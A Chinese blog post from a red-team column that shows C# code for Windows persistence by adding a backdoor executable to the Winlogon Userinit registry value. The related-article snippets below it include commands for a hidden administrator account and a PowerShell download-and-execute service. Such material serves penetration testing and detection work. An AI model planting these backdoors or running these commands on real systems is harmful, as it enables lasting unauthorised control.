.NET 通过UserInit键实现Windows权限维持

最新推荐文章于 2024-11-15 10:23:57 发布
最新推荐文章于 2024-11-15 10:23:57 发布
阅读量293 收藏 5
点赞数 4
文章标签: .net windows 安全 矩阵 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ahhacker86/article/details/140865491
版权

01阅读须知

此文所节选自小报童《.NET 内网实战攻防》专栏,主要内容有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,对内网和后渗透感兴趣的朋友们可以订阅该电子报刊,解锁更多的报刊内容。

02基本介绍

图片

03编码实现

UserInit键位于Windows注册表的路径中,所包含的值表示指向用户登录时系统要启动的初始化程序,利用Windows注册表中的UserInit键,攻击者可以实现权限维持。

3.1 UserInit键

红队可以通过修改UserInit键值将自定义的可执行文件添加到路径中,比如某个远控生成的木马后门文件,这样用户登录时自动执行该文件,以下是实现这一操作的代码示例

string keyName = "Userinit";
string customExecutablePath = @"C:\windows\system32\calc.exe";
string newUserInitValue = $"C:\\windows\\system32\\userinit.exe,{customExecutablePath}";

这里的customExecutablePath变量是要添加的自定义可执行文件的路径,此处便于演示直接定为计算器calc.exe,newUserInitValue是新的UserInit键值,它包含了默认的userinit.exe路径和自定义可执行文件路径。

3.2 更新键写入后门

.NET中使用Registry.LocalMachine.CreateSubKey方法打开UserInit键所在的注册表路径,调用SetValue方法将UserInit键的值更新为新值,确保在用户登录时启动calc.exe,具体代码如下所示。

RegistryKey registryKey = Registry.LocalMachine.CreateSubKey("Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon");
registryKey.SetValue(keyName, newUserInitValue);
registryKey.Close();

通过修改注册表UserInit键来启动自定义程序,是红队在渗透测试和攻击活动中常用的方法之一,从蓝队视角因此需定期检查和监控UserInit键的配置。想要了解更多内网权限维持的文章。

04欢迎加入.NET 电子报刊

本次电子报刊《.NET 内网安全攻防》专栏,内容主要有.NET在各个内网渗透阶段与Windows系统交互的方式和技巧,可细分为以下8个方向。

1) .NET 安全防御绕过
2) .NET 本地权限提升
3) .NET 内网信息收集
4) .NET 内网代理通道
5) .NET 内网横向移动
6) .NET 目标权限维持
7) .NET 数据传输外发
8) .NET 目标痕迹清理

图片

图片

dot.Net安全矩阵
关注
内网渗透-windows权限维持的方法
lza20001103的博客
08-26 1256
windows权限维持的方法 文章目录windows权限维持的方法一、影子账户二、粘滞后门三、logon scripts后门五、注册表自启动后门六、屏幕保护程序后门七、计划任务后门八、服务自启动后门九、黄金票据十、白银票据十二、bitsadmin十五、CLR劫持 一、影子账户 1.使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用
2024年最新Windows权限维持技术总结、复现_cs权限维持,网络安全开发技术总结
2401_84264692的博客
05-06 908
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon的作用是指定用户登录时 Winlogon 运行的程序。默认情况下,Winlogon 运行 Userinit.exe(运行登录脚本),重新建立网络连接,然后启动 Windows 用户界面 Explorer.exe。可以更改此条目的值以添加或删除程序。
应急响应实战笔记03权限维持篇(2)
qq_59468567的博客
02-23 875
利用COM劫持技术,最为关的是dll的实现以及CLSID的选择,通过修改CLSID下的注册表值,实现对CAccPropServicesClass和MMDeviceEnumerator劫持,而系统很多正常程序启动时需要调用这两个实例。如果攻击者能够控制其中的某一 个目录,并且放一个恶意的DLL文件到这个目录下,这个恶意的DLL便会被进程所加载,从而造成代码执行。管理员在平时运维过程应当保持警惕,掌握一定的入侵排查技巧,及时进行系统补丁更新,定期对服务器安全检查,才能有效地预防后门。
.NET 分享一款多种方式维持权限的工具
ahhacker86的专栏
05-27 1330
Sharp4Stay是一款功能强大的工具,专门设计用于在 Windows 环境中维持内网权限。它内置了 10 种不同的方法来确保攻击者可以持久地控制目标系统。以下将详细介绍其中的几种方法,因为图片过长,不便于文章展示,因此通过隐藏部分用法达到缩短图片长度,不便之处请读者朋友们谅解。03工具用法。
windows权限维持的方法
小小猪的博客
01-04 6112
windows权限维持的方法 影子账户: 使用如下命令创建隐藏用户并加入管理员组 net user test$ 123456 /add net localgroup administrators test$ /add 创建成功后使用net user命令无法查看到此用户,但是在计算机管理页面中还是可以看到,需要通过修改注册表来隐藏 打开注册表(HKEY_LOCAL_MACHINE\SAM\SAM),修改SAM权限,赋予adminitrators完全控制权限 重启之后,将Administr.
内网渗透系列:权限维持方法小结
闵行小鱼塘
08-02 2452
小结下权限维持方法
Windows权限维持
2301_76786857的博客
02-07 942
作为一个攻击者,利用漏洞拿下某个服务器或者是终端的控制权限之后,需要考虑的是如何将拿下的主机当作一个据点,保证持续拥有该主机的控制权限,进而方便后续的攻击行为,如内网渗透、挖矿、勒索、持续监控等等。 当安全工程师了解或者是掌握权限维持技术后,也能更快的做出应急响应预案,进行应急处置工作,从而降低企业损失。
内网权限维持——映像劫持&CLR劫持
qq_55202378的博客
08-04 896
IFEO(,镜像文件执行选项)是windows系统的一个注册表项,路径为。在windows NT系统中,IFEO原本是为一些在默认系统环境中允许是可能引发错误的程序执行体提供特殊的环境设定。利用IFEO,开发人员能够在程序运行之前执行程序所配套的环境配置程序。
Windows远控之权限维持
qax
11-23 1355
Windows权限维持 一丶建立系统服务 获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。 1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。 sc create "nuoyan" binpath= "c:\accc.exe" sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/
2024年最全Windows权限维持技术总结、复现_cs权限维持(1),网络安全ui基础
2401_84264583的博客
05-05 978
Windows 上有一个重要的机制,也就是服务。服务程序通常默默的运行在后台,且拥有 SYSTEM 权限,非常适合用于后门持久化。我们可以将 EXE 文件注册为服务来作为后门。Windows 实现计划任务主要有 at 与 schtasks 两种方式,通过计划任务可以定时启动后门程序at 适用于windows 2000、2003、xp,schtasks适用于windows >= 2003利用 windows 开机启动项实现权限维持,每次系统启动都可实现后门的执行,很不错的权限维持的方式。
推荐一个Star超过2K的.Net轻量级的CMS开源项目
成长的足迹
11-11 853
Piranha CMS是一个轻量级且跨平台的CMS库,专为.NET 8设计。该项目提供多种模板,具备CMS基本功能,也有空模板方便从头开始构建新网站,甚至可以作为移动应用的后端。是一个完全解耦的CMS,意味着我们可以使用任何技术以任何方式构建的应用程序。
.NET 9 - BinaryFormatter移除
limingdinghao的博客
11-15 591
NET 9 SDK正式版已经发布, 下载地址是.NET9同时.NET Conf 2024 大会已经从2024-11-13开始了,感觉Aspire和AI的内容相对挺多的,主题分享演示时候打开的网站大部分都是Blazor制作的。这次.NET Conf 2024老师也再次说明了一下,note, BinaryFormatter 存在remote code execution的安全问题BinaryFormatter 从.NET8开始,已经被标记为Obsolete。
「实战应用」如何用图表控件LightningChart .NET在WPF中制作表格?(二)
需要界面开发、IDE工具研发中文教程资料的小伙伴,记得私信我~
11-12 871
本文将为大家介绍如何用图表控件LightningChart .NET在WPF中制作表格,欢迎联系我们获取新产品试用!
.NET 9 中 IFormFile 的详细使用讲解
滴水成河,汇流成海
11-13 428
IFormFile是一个表示上传文件的接口,它提供了以下属性和方法:: 获取上传文件的MIME类型。: 获取与文件关联的Content-Disposition数据。Headers: 获取与文件关联的HTTP头。Length: 获取上传文件的大小(以字节为单位)。Name: 获取上传文件的名称。FileName: 获取上传文件的完整文件名。: 将文件内容异步复制到指定的流中。
.NET 公共语言运行时(Common Language Runtime,CLR)
weixin_49784554的博客
11-12 1074
NET 的公共语言运行时(CLR)是 .NET 应用程序执行的基础,负责管理代码的执行、内存管理、安全性和异常处理等功能。CLR 提供了一种高效、可靠的运行时环境,使得开发者能够专注于应用程序的逻辑,而不必过多关注底层的内存管理和类型安全等问题。通过 JIT 编译和自动垃圾回收,CLR 确保了 .NET 应用程序的性能和安全性,成为现代应用程序开发的强大工具。
3、.Net UI库:CSharpSkin - 开源项目研究文章
lzhdim的专栏
11-14 238
     CSharpSkin(C# 皮肤)是一个基于C#语言开发的UI框架,它允许开发者使用C#和.NET技术栈来创建跨平台的桌面应用程序。CSharpSkin框架通常用于实现具有自定义外观和感觉的应用程序界面,它提供了一套丰富的控件和组件,以及灵活的样式和布局系统。   CSharpSkin的关特性可能包括: 跨平台支持:能够在Windows、macOS和Linux等多个操作系统上运行。...
RDIFramework.NET Web敏捷开发框架 V6.1发布(.NET6+、Framework双引擎)
最新发布
.NET快速开发框架
11-15 668
**RDIFramwork.NET** Web敏捷开发框架V6.1版本发布,本次版本更新得非常多,主要有全面重新设计业务逻辑代码,代码量减少一半以上,开发更加高效。底层引入最易上手的ORM框架SqlSugar,让开发更加便利高效。同时保持与前期版本完美的代码结构,历史版本也可以无缝升级用最新的特性,按当前新的方式重构自己的代码,做到无缝升级过渡。全新设计开发了WebAPI,同时增加了大量WebAPI接口。无论是.NET6+版本,还是.NET Framework版本,功能代码一致.更多详情等你解锁!
Windows权限维持技术解析
这份资料提供了关于Windows系统权限维持的实用技巧,强调了利用Userinit进程设置后门的方法,并展示了如何通过Powershell增强这种控制。对于网络安全专业人员来说,理解并掌握这些知识有助于提高防御和应急响应的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值